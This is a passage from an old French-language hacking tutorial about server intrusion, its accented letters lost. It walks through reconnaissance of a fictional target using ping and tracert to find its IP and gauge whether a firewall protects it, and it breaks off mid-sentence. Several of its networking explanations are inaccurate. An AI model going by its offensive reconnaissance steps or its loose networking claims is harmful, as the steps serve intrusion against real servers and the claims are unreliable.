rvleront inefficaces. J'ai parl de pas mal de ces outils dans diffrents
articles de ce site donc je ne reparlerais pas de ceux la, je les citerais juste
et ferais un lien vers l'article correspondant. Mais ne vous inquitez pas je
donnerais suffisamment d'infos pour que vous compreniez et que vous
puissiez commencer exprimenter un peu.
L on ne parle pas de hack foireux la BO (Back Orifice) ou avec quelques
autres taupes et troyens. L c'est du hack de serveurs qu'il sagit et plus du
pc de grand mre sous win9X. Les risques commencent vritablement pour
vous ici mais comme j'imagine que vous en tes conscience, on va
commencer.
Dans cet article je ne donne pas d'adresse prcise de serveur comme j'ai
fais pour le hack par ftp car a redonnerait encore lieu des abus. Donc le
serveur sera celui de la boite "assassin" et son adresse DNS (domain name
service) sera http://www.assassin.com/. Toutes les manip que j'expliquerais
dans cet article seront ralises sous windows mais se font trs bien (j'ai
entendu mieux dans la salle?) sous linux seulement les commandes
diffrent et je ne les expliquerais pas ici. Je vais revenir rapidement sur les
diffrences entre les adresses ip, DNS et URL. Tous les serveurs ont une
adresse ip (et ouais car la dfinition d'un serveur c'est un ordinateur
connect un rseau et d'autres ordinateurs qui peuvent consulter celui
la) sauf quand ils ne sont pas connects. Pour la dfinition prcise
d'une adresse ip je vous reporte l'article que j'ai crit dessus. Une
adresse DNS est une adresse du type: http: ... . J'crit pas www car a
dpend des adresses DNS il y en a qui n'ont pas DNS mais qui
commencent par autre chose genre http://perso.infonie.fr ou par ww2 ou
www3 ... C'est vrai que c'est plus facile retenir www.assassin.com que
167.34.217.65. Pour obtenir une adresse DNS, la socit qui appartient le
serveur doit dbourser une somme comprise entre 500 et 1000 Frs un
organisme charg d'attribuer ces adresses et qui fait gaffe ce que deux
serveurs diffrents n'en utilisent pas deux identiques. Enfin une adresse
URL c'est les deux choses cites au dessus. On parle d'adresse URL en
pour spcifier quelqu'un que c'est bien de l'adresse d'un serveur par le
port 80 (port utilis pour le www, les pages web quoi) dont on parle et non
d'une adresse E mail. Alors quand on demande l'url d'un site gnralement
on vous donne l'adresse DNS mais on pourrait trs bien vous donner son ip
ca ne changerait rien pour vous. Car bien sur si vous tapez l'ip d'un serveur
dans netscape ou son adresse DNS vous arriverez aux mmes pages.
Sous rserve bien sr que ce serveur ait bien un site web.

Maintenant que ceci est clairci on va en revenir au coeur de notre affaire.


Avec une adresse DNS on ne peut pas faire grand chose, il va nous falloir
l'adresse ip du serveur et pour a on va faire un ping. Pour cel on tape
sous dos:
ping -a www.assassin.com
et a va vous donner son ip :-) ainsi que la
qualit de la connection et la rapidit de la liaison mais a on s'en fout un
peu il faut dire.
Maintenant on va voir combien il y a de machines entre nous et le serveur
assassin. Pour cel plusieurs mthodes. Ou vous utilisez un prog genre
visual route (payant aux dernires nouvelles) ou neotrace ou d'autres
encore ou alors on utilise une commande dos qui s'appelle tracert. Les
progs je n'explique pas comment ils marchent, c'est super simple et ils ont
l'avantage d'tre graphique mais pour ceux qui prfrent les lignes de texte,
c'est l'option dos qu'il vous faut. D'ailleurs je l'explique rapidement et mme
si vous tes un fan des programmes j'imagine que vous n'avez rien contre
un peu de culture gnrale:
Donc sous dos vous allez taper:
tracert url_du_serveur
exemple: tracert 167.34.217.65 ou tracert www.assassin.com (les deux
marchent)
Si il y a marqu "host unreachable" c'est que vous avez mal recopi l'ip
trouve prcdemment ou l'url ou que le serveur n'est plus connect.
Toutes les machines se trouvant entre vous et le serveur cibl se
marqueront avec leur ip. Notez a dans un coin ou faites une capture
d'cran (Impr cran). La dernire ip marque sera celle de la cible. Et si
celle juste avant celle de la cible a les trois mmes numros que celle de
votre cible c'est que la cible laquelle vous tentez de vous attaquer est
plus que probablement secure. Ca va tre drle. En langage de nophyte
c'est qu'il y a une machine dispos sur le LAN (Un LAN est la ligne entre le
rseau interne et le rseau externe) entre la machine cible et Internet et qui
assure sa protection. C'est a dire que l'administrateur system a investi dans
une machine (il peut y en avoir mme plusieurs) qui ne sert qu' la scurit
et a rien d'autre. C'est soit un firewall soit un routeur filtrant soit un bastion
soit un bunker soit un garde-barrire soit une proxy ou je ne sais quelle
autre saloperie de ce genre :-). Si une telle machine place sur le LAN
n'existe pas quand vous avez fait le tracert ce n'est pas pour cela qu'une
protection du mme type n'est pas incluse dans le serveur assassin lui
mme (c'est presque toujours le cas d'ailleurs) mais gnralement c'est un
indice assez fiable du niveau de scurit d'un rseau.
Si vous avez lu l'article sur les ip vous savez que les trois premiers nombre
d'une ip correspondent un domaine et que le dernier nombre correspond
a une machine de ce rseau. Dans cet exemple le domain est 167.34.217
puisque l'ip du serveur assassin est 167.34.217.65 et la machine est sur le
"poste" 65. Dans la trs grande majorit des cas (que dis je, la totalit) il y a

plusieurs machines dans un mme domaine et elle doit avoir un numro de


"poste" situ entre 0 et 255. Bien sr il y a des domaines qui ont plus de
256 serveurs relis entre eux et dans ce cas ils ont soit plusieurs domaines
relis internet (c'est le cas d'aol qui en a des centaines qui commencent
par 162, 171, 172,...) soit ont des sous rseaux l'intrieur des domaines
qui ne sont pas relis directement internet et qui utilisent des ip peut tre
dj utilises pas d'autre serveurs sur internet mais comme elles n'ont pas
de connection directe internet aucun problme ne se pose. Et si elles
veulent se connecter quand mme internet elle s'y connectent travers
un proxy et prennent donc l'ip de ce proxy pour obtenir les rponses
provenant de l'internet ou du rseau externe. Un proxy est un type de
firewall qui tran